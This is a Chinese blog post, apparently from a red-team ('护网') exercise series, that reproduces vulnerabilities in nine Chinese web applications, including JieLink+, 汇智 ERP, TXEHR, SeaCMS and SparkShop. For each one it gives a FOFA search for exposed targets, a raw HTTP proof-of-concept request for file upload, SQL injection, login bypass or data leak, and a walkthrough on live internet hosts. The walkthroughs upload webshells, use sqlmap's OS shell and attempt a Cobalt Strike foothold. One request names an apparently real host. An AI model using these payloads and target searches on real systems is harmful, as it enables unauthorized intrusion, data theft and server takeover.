首页 > 其他分享 >护网漏洞复现(二)

护网漏洞复现(二)

时间:2024-09-04 09:39:43浏览次数:4  
标签:form xxx Accept Content 漏洞 复现 fofa 护网

JieLink+智能终端操作平台多个接口存在敏感信息泄露漏洞

描述:JieLink+智能终端操作平台多个接口存在此漏洞,攻击者可以利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。

fofa语法:title="JieLink+智能终端操作平台"

POC:

1、 http://xxx.xxx.xxx.xxx/report/ParkChargeRecord/GetDataList

2、 http://xxx.xxx.xxx.xxx/Report/ParkCommon/GetParkInThroughDeivces

漏洞复现:

fofa搜索资产,共有1065条数据匹配

img

以下为登录页面以及页面特征

img

访问http://xxx.xxx.xxx.xxx/report/ParkChargeRecord/GetDataList

img

访问http://xxx.xxx.xxx.xxx/Report/ParkCommon/GetParkInThroughDeivces

img

奥威亚云视频平台UploadFile.aspx存在文件上传漏洞

描述:为满足高校培养人才和教学管理的需求,顺应时代的发展,奥威亚围绕大数据下的学习和教育,推出升级版的高校视频应用云平台。奥威亚云视频平台UploadFile.aspx存在文件上传漏洞,攻击者可上传webshell获取服务器权限

fofa语法:body="/Upload/DomainInfo/MaxAVALogo.png"

POC:

POST /Services/WeikeCutOut/UploadFile.aspx?VideoGuid=/../../ HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5666.197 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate, br

Content-Type: multipart/form-data; boundary=----sajhdjqwjejqwbejhqwbjebqwhje

------sajhdjqwjejqwbejhqwbjebqwhje

Content-Disposition: form-data; name="file"; filename="test.aspx."

Content-Type: image/jpeg

test

漏洞复现:

fofa中搜索资产,共有37条数据匹配

img

37条数据我每个都访问了一遍,只有两个地址可以正常访问,且都存在此漏洞

img

图形用户界面, 网站  描述已自动生成

抓包后修改数据包

图形用户界面, 文本, 应用程序  描述已自动生成

文件访问地址:http://ip/test.aspx

尝试上传木马进行远控

img

img

没有域环境

文本  描述已自动生成

私有云管理平台存在登录绕过漏洞

描述:任意用户登录指系统用户或者非系统用户都可以通过利用身份验证校验业务罗技设计缺陷漏洞来实现登录任意用户的目的。

fofa语法:title="私有云管理后台"

POC:

抓取登录时候的返回包,修改响应内容如下

{"code":1000,"msg":"BscDYP2u0qLelgSB6XT1AxbULeN55ZayHYnmPEDnib4="}

漏洞复现:

fofa中搜索资产,共有163条数据匹配

img

以下为登录页面以及页面特征

图形用户界面, 应用程序  描述已自动生成

输入用户名密码以及验证码后点击登录,抓取登陆包的返回包,修改返回内容为

{"code":1000,"msg":"BscDYP2u0qLelgSB6XT1AxbULeN55ZayHYnmPEDnib4="}

图形用户界面, 应用程序  描述已自动生成

电脑萤幕的截图  描述已自动生成

汇智企业资源管理系统存在文件上传漏洞

描述:汇智ERP是一款由江阴汇智软件技术有限公司开发的企业资源规划(ERP)软件,旨在通过信息化手段帮助企业优化业务流程,提升管理效率,增强综合竞争力。适用于各类企业,包括大型企业、中小型企业以及集团化企业。根据企业规模和业务需求,汇智ERP提供了不同的版本(如集团版和标准版),以满足企业的个性化需求。该系统的Upload.aspx 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器 。

fofa语法:icon_hash="-642591392"

POC:

POST /nssys/common/Upload.aspx?Action=DNPageAjaxPostBack HTTP/1.1

Host: xxx.xxx.xxx.xxx

Content-Length: 1033

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Content-Type: multipart/form-data; boundary= ----WebKitFormBoundaryLkkAXATqVKBHZ8zk

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Connection: close

------WebKitFormBoundaryLkkAXATqVKBHZ8zk

Content-Disposition: form-data; name="__VIEWSTATE"

/wEPDwUJOTc0NzkxMzQ1D2QWAgIDDxYGHhdJc0JlZm9yZU9wZXJhdGVTYXZlRGF0YWgeBmlzZ3VpZAUBMR4OY2hlY2tmb3Jtc3RhdGUFATBkZHwobq1hNj9MTgjOtrIn/0gbCdhD

------WebKitFormBoundaryLkkAXATqVKBHZ8zk

Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"

573D6CFB

------WebKitFormBoundaryLkkAXATqVKBHZ8zk

Content-Disposition: form-data; name="upfile_Input"

------WebKitFormBoundaryLkkAXATqVKBHZ8zk

Content-Disposition: form-data; name="upfile_upload"; filename="1"

Content-Type: image/jpeg

<head> <title>ASP.NET Web Forms Example</title> </head> <body>

<%@ Page Language="C#" %>

<% Response.Write("hello,world"); %>

</body>

------WebKitFormBoundaryLkkAXATqVKBHZ8zk

Content-Disposition: form-data; name="upfilename"'

2.aspx

------WebKitFormBoundaryLkkAXATqVKBHZ8zk

Content-Disposition: form-data; name="dnpostmethodname"

uploadfile

------WebKitFormBoundaryLkkAXATqVKBHZ8zk—

漏洞复现:

fofa搜索资产,共有72条数据

img

以下为登录页面以及页面特征

img

构造POC上传数据包

图形用户界面, 文本, 应用程序  描述已自动生成

访问响应内容中显示的地址

图形用户界面, 文本, 网站  描述已自动生成

超易企业管理系统Login.ashx存在SQL注入漏洞

描述:超易企业管理系统提供了极高的灵活性,允许用户根据实际需求自定义资产设备的信息录入项目,超易企业管理系统Login.ashx存在SQL注入漏洞,攻击者可利用该漏洞获取数据库中的敏感信息,利用xp_cmdshell可执行任意命令

fofa语法:"超易企业管理系统"

POC:

POST /ajax/Login.ashx?Date=%271724566193296%27 HTTP/1.1

Host: xxx.xxx.xxx.xxx

Priority: u=0

X-Requested-With: XMLHttpRequest

Referer: http:// xxx.xxx.xxx.xxx /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Origin: http:// xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0

Accept: text/plain, /; q=0.01

Content-Length: 89

username=admin*&password=admin&loginguid=f266ff4c-8cdf-47cd-8cfc-b418eb4188c5&logintype=pc

漏洞复现:

fofa中搜索资产,共有9条数据匹配

img

以下为登录页面以及页面特征

图形用户界面  中度可信度描述已自动生成

随便输入用户名和密码点击登录抓包

图形用户界面, 应用程序  描述已自动生成

正常情况是会返回用户名或密码不正确的,但是在你输入的用户名后天加上一个单引号就会报错

img

很明显是存在SQL注入漏洞的

在单引号后面构造闭合

img

已经确定是存在SQL注入了,还是字符型注入

通过order by判断存在29个字段

img

将数据包放入到sqlmap中进行测试

img

本来想尝试xpcmd的,但是找的这个系统无法开启xp_cmdshell

同享人力管理管理平台SFZService.asmx存在SQL注入漏洞

描述:同享人力资源管理系统-TXEHR V15 SFZService.asmx接口多个实例存在SQL注入漏洞,攻击者除了可以利用SQL注入漏洞获取数据库中的敏感数据之外,甚至在搞权限的情况下向服务器写入木马,进一步获取服务器系统权限。

fofa语法:body="/Assistant/Default.aspx"

POC:

POST /Service/SFZService.asmx HTTP/1.1

Host: oa.kofagroup.com.cn:9000

SOAPAction: http://tempuri.org/GetEmployeeBySFZ

Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"

xmlns:tem="http://tempuri.org/">

soapenv:Header/

soapenv:Body

tem:GetEmployeeBySFZ

tem:strSFZ1*</tem:strSFZ>

</tem:GetEmployeeBySFZ>

</soapenv:Body>

</soapenv:Envelope>

漏洞复现:

fofa中搜索资产,共有85条数据匹配

img

以下为登陆页面以及页面特征

手机截图图人的照片上写着字  描述已自动生成

访问http://xxx.xxx.xxx.xxx/Service/SFZService.asmx

图形用户界面, 文本, 应用程序  描述已自动生成

修改数据包

img

从上图可以看到返回的内容是正常的,在tem:strSFZ1</tem:strSFZ>中的数字1后面加上一个单引号看看能不能报错,如果报错了就说明很大的可能存在SQL注入

img

然后在单引号后面构造闭合语句,如果成功闭合,说明存在SQL注入漏洞

图形用户界面, 文本, 应用程序  描述已自动生成

把数据包放到sqlmap中进行测试

img

使用--os-shell命令可获取目标系统权限

img

想要尝试将这个系统上线CS

在CS中生成一个木马脚本准备上传

但是目标服务器无法执行powershell命令,sqlmap的文件上传也失败了,由于没有搭建公网ftp服务器就没有尝试ftp文件上传了,上线CS失败

点企来客服系统getwaitnum存在SQL注入漏洞

描述:点企来客服系统getwaitnum存在SQL注入漏洞,攻击者可以未授权访问数据库中的敏感数据,盗取用户个人隐私以及个人信息,造成用户的信息泄露。

fofa语法:body="layui-form-item" && body="/admin/login/check.html"

POC:

POST /admin/event/getwaitnum HTTP/2

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

Connection: keep-alive

Content-Length: 84

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Accept-Encoding: gzip, deflate, br

business_id[]=exp&business_id[]=+and+updatexml(1,concat(0x7e,md5(0x5c)),1)&groupid=1

漏洞复现:

在fofa中搜索资产,共有4218条数据匹配

img

以下为登录页面以及页面特征

img

当前页面刷新获取数据包

尝试测试字符型注入失败,无法闭合

图形用户界面, 应用程序  描述已自动生成

尝试测试数字型,and 1=1和and 1=2返回结果都为0

图形用户界面, 应用程序  描述已自动生成

尝试报错注入

img

当前系统存在报错注入

SeaCMS海洋影视管理系统index.php存在SQL注入漏洞

描述:SeaCMS海洋影视管理系统存在SQL注入漏洞,攻击者可利用该漏洞获取目标服务器数据库中的敏感数据。

fofa语法:app="海洋CMS"

POC:

POST /js/player/dmplayer/dmku/index.php?ac=edit HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

Accept-Ldwk: bG91ZG9uZ3dlbmt1

Accept-Encoding: gzip, deflate

Accept: /

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 56

cid=1&text=1*&color=1

漏洞复现:

fofa中搜索资产,共有3469条数据匹配

img

访问http://xxx.xxx.xxx.xxx/js/player/dmplayer/dmku/index.php?ac=edit

img

抓取当前数据包,将GET修改为POST

图形用户界面, 文本, 应用程序  描述已自动生成

从cid开始测试,输入一个单引号看看能不能报错

图形用户界面, 文本, 应用程序  描述已自动生成

很明显不能,然后测试是否有可能是数字型,and 1=1和and 1=2返回内容一样

图形用户界面, 文本  描述已自动生成

尝试报错注入,返回的内容依旧没有变

img

最后尝试盲注,经测试发现存在时间盲注

图形用户界面, 文本, 应用程序  描述已自动生成

图形用户界面, 文本  描述已自动生成

将数据包放入到sqlmap中进行测试没有测出来

南京星源图科技SparkShop存在任意文件上传漏洞

描述:南京星源图科技SparkShop商城存在任意文件上传漏洞,攻击者可利用此漏洞获取服务器权限。

fofa语法:"SparkShop" && icon_hash="852413517"

POC:

POST /api/Common/uploadFile HTTP/1.1

Host: xxx.xxx.xxx.xxx

Cache-Control: max-age=0

Sec-Ch-Ua: "Not)A;Brand";v="99", "Google Chrome";v="127", "Chromium";v="127"

Sec-Ch-Ua-Mobile: ?0

Sec-Ch-Ua-Platform: "macOS"

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7

Sec-Fetch-Site: none

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Priority: u=0, i

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR

Content-Length: 178

------WebKitFormBoundaryj7OlOPiiukkdktZR

Content-Disposition: form-data; name="file";filename="1.php"

------WebKitFormBoundaryj7OlOPiiukkdktZR--

漏洞复现:

fofa中搜索资产,共有488条数据匹配

img

以下为登录页面以及页面特征

图形用户界面, 应用程序, 网站  描述已自动生成

当前页面抓包构造数据包内容

图形用户界面, 文本, 应用程序  描述已自动生成

会返回文件上传后的地址,访问该地址即可

图形用户界面, 应用程序  描述已自动生成

上传一句话木马,使用蚁剑进行连接

img

图形用户界面, 应用程序  描述已自动生成

有的网站在连接的时候会提示{"code":"CERT_HAS_EXPIRED"},需要勾选蚁剑中忽略HTTPS证书,获得了www的权限

img

标签:form,xxx,Accept,Content,漏洞,复现,fofa,护网
From: https://www.cnblogs.com/LeouMaster/p/18395826

相关文章

  • 护网漏洞复现(三)
    Mtab书签导航程序LinkStoregetlcon存在SQL注入漏洞描述:Mtab书签导航程序LinkStore/getIcon接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步......
  • 护网漏洞复现
    金程云OAUploadFile存在任意文件上传漏洞描述:金程云OAUploadFile存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。fofa语法:body="images/yipeoplehover.png"POC:POST/OA/api/2.0/Common/AttachFi......
  • 春秋云镜-RCE靶场漏洞复现
    CVE-2023-26469image.png靶标介绍:Jorani是一款开源的员工考勤和休假管理系统,适用于中小型企业和全球化组织,它简化了员工工时记录、休假请求和审批流程,并提供了多语言支持以满足不同地区的需求。在Jorani1.0.0中,攻击者可以利用路径遍历来访问文件并在服务器上执行......
  • Pikachu文件包含漏洞(本地和远程)
    一、本地文件包含打开靶场,选择一个查看读取一个本地文件查看二、远程文件包含在云服务器创建一个txt文件写入<?phpfputs(fopen("shell.php","w"),'<?phpeval($_POST["cmd"]);?>')?>在本机上查看,会生成一个6.php,使用蚁剑连接查看......
  • 应用程序报错漏洞修复
    漏洞描述错误页面由服务器产生400、403、404、500等错误时,返回详细错误信息。报错信息中可能会包含服务器代码信息、服务器版本信息、模板类型、数据库连接信息、SQL语句或者敏感文件的路径。修复修改nginx配置#其他配置...server{#其他配置...#指定400......
  • 文件包含PHP伪协议利用方法 本地复现
    环境配置步骤一:更改参数php.ini⾥有两个重要的参数allow_url_fopen、allow_url_include步骤二:创建123.php文件输入一句话木马步骤三:创建1.phpless-1 file://协议123.php?cmd=file://D:\phpstudy_pro\WWW\1.phpless-2 php://filter协......
  • pikachu文件包含漏洞靶场
    Fileinclusion(local)创建1.php步骤一:选择一个球员提交../../../../1.phpFileInclusion(remote)(远程文件包含)步骤一:更改参数php.ini⾥有两个重要的参数allow_url_fopen、allow_url_include;步骤二:选择球员步骤三:宝塔公网上创建一个6.txt文......
  • 【SCI复现】基于纳什博弈和ADMM的多微网主体能源共享研究(Matlab代码实现)
    ......
  • 【太阳能学报EI复现】基于粒子群优化算法的风-水电联合优化运行分析(Matlab代码实现)
    ......
  • pikachu文件包含漏洞靶场攻略
    1.Fileinclusion(local)(本地文件包含)步骤一:选择一个球员提交步骤二:filename后面输入../../../../shw.php访问php文件2.FileInclusion(remote)(远程文件包含)步骤一:修改配置远程包含漏洞的前提:需要php.ini配置如下:allow_url_fopen=on//默认打开Allow_url_include=on/......